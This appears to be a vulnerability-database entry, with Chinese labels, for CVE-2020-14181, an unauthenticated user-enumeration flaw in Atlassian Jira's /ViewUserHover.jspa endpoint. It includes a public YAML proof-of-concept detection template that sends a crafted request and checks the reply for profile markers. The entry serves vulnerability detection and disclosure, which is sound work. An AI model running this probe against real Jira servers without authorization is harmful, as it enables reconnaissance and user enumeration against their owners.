CVE-2020-14181: Jira Unauthorized User Enumeration
日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开
漏洞描述
Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
PoC代码[已公开]
id: CVE-2020-14181
info:
name: Jira Unauthorized User Enumeration
author: whwlsfb
severity: medium
description: |-
Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-14181
tags: cve,cve2020,jira,enumeration
created: 2024/04/18
set:
r: randomLowercase(8)
rules:
r0:
request:
method: GET
path: /secure/ViewUserHover.jspa?username={{r}}
expression: response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira"))
expression: r0()